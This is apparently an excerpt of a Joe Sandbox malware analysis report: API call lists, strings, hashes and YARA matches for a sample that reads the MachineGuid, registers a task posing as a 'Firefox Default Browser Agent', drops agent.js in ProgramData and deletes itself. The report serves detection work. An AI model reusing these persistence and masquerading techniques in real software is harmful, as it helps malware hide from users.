                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: HeapQueryValue$AllocCloseOpenProcess
                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                • API String ID: 2639912721-1211650757
                • Opcode ID: 5d268407b25b70e6c47d493dcae6a662b0a01af10eeec90b82a2ebad1d5cddbd
                • Instruction ID: 516994422dbc28bf24e611383cc51cf6f2ab9669c33f19e23881693d013ad5cc
                • Opcode Fuzzy Hash: 5d268407b25b70e6c47d493dcae6a662b0a01af10eeec90b82a2ebad1d5cddbd
                • Instruction Fuzzy Hash: 2D41EE35E04215ABEB398BACC884BBBBBB9EF09300F14446CDB45E7291D7718985C790
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: 1$H$P$jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug
                • API String ID: 2802545854-3608006743
                • Opcode ID: cf2100c629557a7f3f4037ae4aa4b4ac6a670f5ae7e27e048b9e19090a1606b2
                • Instruction ID: 898158b0e5aae283accf5892b148e50089f164d0d96c29fd352a6935a787d9a1
                • Opcode Fuzzy Hash: cf2100c629557a7f3f4037ae4aa4b4ac6a670f5ae7e27e048b9e19090a1606b2
                • Instruction Fuzzy Hash: 30414770D00249EFDF14DFA8E999BEDBBB1FB00705F604129E812A7284DB785A59CB50
                APIs
                • VariantInit.OLEAUT32(?), ref: 011F6AE7
                • CoCreateInstance.OLE32(011F1020,00000000,00000001,011F1000,?), ref: 011F6B04
                • SysAllocString.OLEAUT32(\Mozilla), ref: 011F6B44
                • SysFreeString.OLEAUT32(?), ref: 011F6B7B
                • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 011F6B88
                • SysFreeString.OLEAUT32(00000000), ref: 011F6B9F
                Strings
                • Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 011F6B83
                • \Mozilla, xrefs: 011F6B3F
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFree$CreateInitInstanceVariant
                • String ID: Firefox Default Browser Agent 458046B0AF4A39CB$\Mozilla
                • API String ID: 478541636-252850850
                • Opcode ID: 7dc88f46bdb9d67f096041b3ea03af12d65ebb437feb4f0cd15bb03733dd081f
                • Instruction ID: 11a58b347bcd76c4f72741a341db621162f57be3e7389b2093d7696c619b7c63
                • Opcode Fuzzy Hash: 7dc88f46bdb9d67f096041b3ea03af12d65ebb437feb4f0cd15bb03733dd081f
                • Instruction Fuzzy Hash: 3831C170F04248BFD7149B69C889BAEBBB8EF49304F0441ACFA05E7241D731AD84CBA5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: char_traits
                • String ID: &$8$9$jgjqrkqomrozhbdhmdxtwulfach$uqip
                • API String ID: 1158913984-1523665428
                • Opcode ID: 39ce8d3ed4882a8cad2554797095eff674f53136e6a0e80362fd615753399738
                • Instruction ID: 6e1a9f6b1c1fc3232dba9cf732a1c270670f46a206c03345fc1627006ff7049f
                • Opcode Fuzzy Hash: 39ce8d3ed4882a8cad2554797095eff674f53136e6a0e80362fd615753399738
                • Instruction Fuzzy Hash: 7A415970D04248DADF14EFE8E9497ADBBB1FB45324F148219D0127B28ADB7D6A46CB41
                APIs
                Strings
                • jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh, xrefs: 0079276C
                • wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji, xrefs: 00792746, 00792781, 0079279E
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh$wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji
                • API String ID: 2802545854-3928441437
                • Opcode ID: 93b22b9fe0e9132853af634c8e47017b94b5fe249e6e0f83ac6cd02ae6516725
                • Instruction ID: 4f1747183ef39c9e163a287c8b430d5ff1763591a1537bb6dc1676c7936d1086
                • Opcode Fuzzy Hash: 93b22b9fe0e9132853af634c8e47017b94b5fe249e6e0f83ac6cd02ae6516725
                • Instruction Fuzzy Hash: 6D417870D04288DEDF10EFA8E859BEEFBB5AF15304F108259D0157B282DB791A4ACB51
                APIs
                Strings
                • dzydwibcsmroxflhizzvayjcy, xrefs: 00792482
                • fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm, xrefs: 007924CF
                • cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy, xrefs: 007924A0
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy$dzydwibcsmroxflhizzvayjcy$fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm
                • API String ID: 1455298312-3639978120
                • Opcode ID: 489e54c38b27d6a9945ff3c844703890df1f9bf69f4a233c4d6f28a3b236a14a
                • Instruction ID: f09ea0c70c25fda15e1d435b1851586ab0771077df5ae52ee8b1820b3550c144
                • Opcode Fuzzy Hash: 489e54c38b27d6a9945ff3c844703890df1f9bf69f4a233c4d6f28a3b236a14a
                • Instruction Fuzzy Hash: 2F214A71D04788DADB01DFA8D819BEEBBB5BF16700F108259E4116B291EB791B55CB80
                APIs
                • InternetCrackUrlW.WININET(011FA104,00000000,00000000,0000003C), ref: 011F6545
                • GetProcessHeap.KERNEL32(00000008,00000001,011FA104), ref: 011F6567
                • HeapAlloc.KERNEL32(00000000), ref: 011F656A
                • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 011F65D9
                • HeapAlloc.KERNEL32(00000000), ref: 011F65DC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocProcess$CrackInternet
                • String ID: <
                • API String ID: 2637570027-4251816714
                • Opcode ID: 022ad1fb54e6f1deeea9bf4f66048853fcb1c8c545e3d50f2926be6aa877bba1
                • Instruction ID: f87d3fb5c54403d17be4dee6ec94a19413792e9338050efa3b2aee0537ce0265
                • Opcode Fuzzy Hash: 022ad1fb54e6f1deeea9bf4f66048853fcb1c8c545e3d50f2926be6aa877bba1
                • Instruction Fuzzy Hash: B651DF30A002468FEB28CFACD484BAEBBB5FF49314F28446DD655EB611DB71D942CB50
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00794D87
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00794D8F
                • _ValidateLocalCookies.LIBCMT ref: 00794E18
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00794E43
                • _ValidateLocalCookies.LIBCMT ref: 00794E98
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: dc7e41ba8194619359d65ee9b65fa004c06da3c5e173ef4b9e2d231d34e70480
                • Instruction ID: 6c08e63139e1b42fb212834645d5afddf337f701f4628f4ec2387aec47f309e1
                • Opcode Fuzzy Hash: dc7e41ba8194619359d65ee9b65fa004c06da3c5e173ef4b9e2d231d34e70480
                • Instruction Fuzzy Hash: 6741D434E00209EBCF10DF68E884E9EBBF5BF45324F148199E9155B392D739AD16CB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID:
                • String ID: api-ms-$ext-ms-
                • API String ID: 0-537541572
                • Opcode ID: 4ae8f3f031cbb7b23eb252990c79b044b6059e083eec6c37d992c9fc0ece33d0
                • Instruction ID: 3a140306b5172c137b1038f40b58393246ed3e65181a0892d0eaf462819f8c11
                • Opcode Fuzzy Hash: 4ae8f3f031cbb7b23eb252990c79b044b6059e083eec6c37d992c9fc0ece33d0
                • Instruction Fuzzy Hash: E721EE71906260BBDF218B2CBC48F5F37649B42760F114110ED09A72E1E6BCED00D6E7
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
                • API String ID: 2802545854-2962047866
                • Opcode ID: 02df582df4acd92695109580807627f203bf8fc2170c7caa74ea1381c42e8c2f
                • Instruction ID: 57cbe137c37698cb2bd8d3d131dc486a88a86357427bf3f03d6351717ac1df04
                • Opcode Fuzzy Hash: 02df582df4acd92695109580807627f203bf8fc2170c7caa74ea1381c42e8c2f
                • Instruction Fuzzy Hash: 77313A70D04758EEEF20DB68D859BEEBBB1AB05704F10419DE00577282EB791B89CF61
                APIs
                  • Part of subcall function 00799D96: _free.LIBCMT ref: 00799DBB
                • _free.LIBCMT ref: 00799E1C
                  • Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
                  • Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA
                • _free.LIBCMT ref: 00799E27
                • _free.LIBCMT ref: 00799E32
                • _free.LIBCMT ref: 00799E86
                • _free.LIBCMT ref: 00799E91
                • _free.LIBCMT ref: 00799E9C
                • _free.LIBCMT ref: 00799EA7
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
                • Instruction ID: 68576327420f4624c5c451f82fff33a43f2dd9b28627f83d40a550a55f4a49bf
                • Opcode Fuzzy Hash: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
                • Instruction Fuzzy Hash: FA118131A45B04EAEE30BBB5EC4BFCBB79E5F01740F804818B39D66052DA3DB5458750
                APIs
                • ExpandEnvironmentStringsW.KERNEL32(%ProgramData%,?,00000104), ref: 011F724A
                • PathCombineW.SHLWAPI(?,?,agent.js), ref: 011F7263
                  • Part of subcall function 011F6AD0: VariantInit.OLEAUT32(?), ref: 011F6AE7
                  • Part of subcall function 011F6AD0: CoCreateInstance.OLE32(011F1020,00000000,00000001,011F1000,?), ref: 011F6B04
                  • Part of subcall function 011F6AD0: SysAllocString.OLEAUT32(\Mozilla), ref: 011F6B44
                  • Part of subcall function 011F6AD0: SysFreeString.OLEAUT32(?), ref: 011F6B7B
                  • Part of subcall function 011F6AD0: SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 011F6B88
                  • Part of subcall function 011F6AD0: SysFreeString.OLEAUT32(00000000), ref: 011F6B9F
                  • Part of subcall function 011F9040: GetFileAttributesW.KERNEL32(?,011F7279), ref: 011F9041
                • DeleteFileW.KERNEL32(?), ref: 011F7284
                • ExitProcess.KERNEL32 ref: 011F728C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFileFree$AttributesCombineCreateDeleteEnvironmentExitExpandInitInstancePathProcessStringsVariant
                • String ID: %ProgramData%$agent.js
                • API String ID: 1026123424-2175136953
                • Opcode ID: 4c2c1be187d0c15e919e934460deb41de29e8b62b10b6be76435e50fbdf3bcf0
                • Instruction ID: 18875fb7f230db04ab6188183614c64080974db52c1c25af4213684130c16809
                • Opcode Fuzzy Hash: 4c2c1be187d0c15e919e934460deb41de29e8b62b10b6be76435e50fbdf3bcf0
                • Instruction Fuzzy Hash: 9FF065B140421CABD728EBA0DC4DFD9777CAB04304F0044BDB76692054DBB056C8CF64
                APIs
                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0079C040
                • __fassign.LIBCMT ref: 0079C225
                • __fassign.LIBCMT ref: 0079C242
                • WriteFile.KERNEL32(?,0079AD05,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0079C28A
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0079C2CA
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0079C372
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                • String ID:
                • API String ID: 1735259414-0
                • Opcode ID: 5dfd227333b0c761d94a4415f751fda7da175626748c6d17f0331486f981fe3b
                • Instruction ID: 76e57f1eed1dfacc9238d8f0c92dd0ab5f85666b10bb073fa8cb00eb0d4badff
                • Opcode Fuzzy Hash: 5dfd227333b0c761d94a4415f751fda7da175626748c6d17f0331486f981fe3b
                • Instruction Fuzzy Hash: 6BC19EB1D042589FCF15CFE8D8849EDBBB5AF49314F28816AE856BB342D2359D42CF60
                APIs
                • Sleep.KERNEL32(00000000), ref: 011F7DD6
                • lstrcmpA.KERNEL32(00000000,INIT), ref: 011F7DE3
                • StrToIntA.SHLWAPI(00000000), ref: 011F7EA6
                • GetTickCount64.KERNEL32 ref: 011F82AB
                  • Part of subcall function 011F55F0: GetProcessHeap.KERNEL32(00000008,00000001,011F7E6E,00000001,00000000), ref: 011F55F3
                  • Part of subcall function 011F55F0: HeapAlloc.KERNEL32(00000000), ref: 011F55FA
                • StrToIntA.SHLWAPI(00000000), ref: 011F81A4
                • StrToIntA.SHLWAPI(?), ref: 011F81AD
                • CreateThread.KERNEL32(00000000,00000000,Function_000072A0,00000000,00000000,00000000), ref: 011F81C1
                • CloseHandle.KERNEL32(00000000), ref: 011F81CC
                  • Part of subcall function 011F5610: GetProcessHeap.KERNEL32(00000000,00000000,011F82F5), ref: 011F5617
                  • Part of subcall function 011F5610: HeapFree.KERNEL32(00000000), ref: 011F561E
                • Sleep.KERNEL32(00000000), ref: 011F8306
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
                • String ID:
                • API String ID: 1253608127-0
                • Opcode ID: 66e5b396ecfbdc60653f36e6f2b4e2abbad010aa77bd39f13a3fa72d75aa8a19
                • Instruction ID: 9f86b69c287d8977ea1b114636150bee1fefd981931520fda1453665a26ccc61
                • Opcode Fuzzy Hash: 66e5b396ecfbdc60653f36e6f2b4e2abbad010aa77bd39f13a3fa72d75aa8a19
                • Instruction Fuzzy Hash: 1221B535E0061697DF2CAFB4E850B7FB679AF84714F00452DEB26A72C4DB74A900C7A9
                APIs
                • GetLastError.KERNEL32(?,?,0079509B,00794C89,007943FF), ref: 007950B2
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007950C0
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007950D9
                • SetLastError.KERNEL32(00000000,0079509B,00794C89,007943FF), ref: 0079512B
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: fe5747c060d69441aa663b52adfaa83a3f52fb9977f11fd4fb00689d38d47120
                • Instruction ID: c4dafae929d70c31186f533eb6a30bc4471dcfabb1471d0cb304e863912bd3af
                • Opcode Fuzzy Hash: fe5747c060d69441aa663b52adfaa83a3f52fb9977f11fd4fb00689d38d47120
                • Instruction Fuzzy Hash: 9801F732909B35DEAF2627B47C8A72B2B54EB96775730432AF610451F1FF9D4C056348
                APIs
                  • Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080
                • task.LIBCPMTD ref: 00791C63
                • task.LIBCPMTD ref: 00791C72
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: O$ggieqzszmbzlvilbxhiegdimtjzyfwhho
                • API String ID: 1455298312-2259853572
                • Opcode ID: 7da92fb6d65c858e77ca5f2390231b829e448ddfb0418109ec3b1e09cc6d6c21
                • Instruction ID: 9dddcc4d631c76a4f2f204cab162b18c40bcf3941371081c2a49ceaafcc52aef
                • Opcode Fuzzy Hash: 7da92fb6d65c858e77ca5f2390231b829e448ddfb0418109ec3b1e09cc6d6c21
                • Instruction Fuzzy Hash: 94414B70D44209DBDF14CFA8E995BADBBB1FB06304F604229E412AB281EB7C5A54DB64
                APIs
                Strings
                • * , xrefs: 00792022
                • zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads, xrefs: 00792029
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: * $zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads
                • API String ID: 1455298312-2972419988
                • Opcode ID: 523f4e6790787a01cf263af7ad1369ab0bf32ad64d2e3c54de32401c531b1026
                • Instruction ID: fef6091e616ab1d74e9365fafe36cb72b48a9a1de466f275de66ba2a1cfde26f
                • Opcode Fuzzy Hash: 523f4e6790787a01cf263af7ad1369ab0bf32ad64d2e3c54de32401c531b1026
                • Instruction Fuzzy Hash: 63111B71D04648EACF04DFA8E859BEEF7B5EF09710F108659E82177291EF391618CB94
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,007975D9,?,?,007975A1,?,?,?), ref: 0079763C
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0079764F
                • FreeLibrary.KERNEL32(00000000,?,?,007975D9,?,?,007975A1,?,?,?), ref: 00797672
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 87eb4c86782e44d3427f9698e774951d48169fb12509aba375fee780b4ef7933
                • Instruction ID: 4947887c96f9d20c0d0889870521c9e410a50f5017e4ef6a572927b0e32d50b4
                • Opcode Fuzzy Hash: 87eb4c86782e44d3427f9698e774951d48169fb12509aba375fee780b4ef7933
                • Instruction Fuzzy Hash: E7F0A735611719FBEF119B54DC09BDE7E78EB81796F404160F500A21A0CB788E00DB98
                APIs
                • _free.LIBCMT ref: 00799D45
                  • Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
                  • Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA
                • _free.LIBCMT ref: 00799D57
                • _free.LIBCMT ref: 00799D69
                • _free.LIBCMT ref: 00799D7B
                • _free.LIBCMT ref: 00799D8D
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
